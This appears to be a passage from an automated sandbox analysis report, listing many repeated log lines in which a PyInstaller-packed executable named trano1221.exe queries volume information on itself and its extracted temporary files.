                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\jaraco VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\wheel-0.24.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
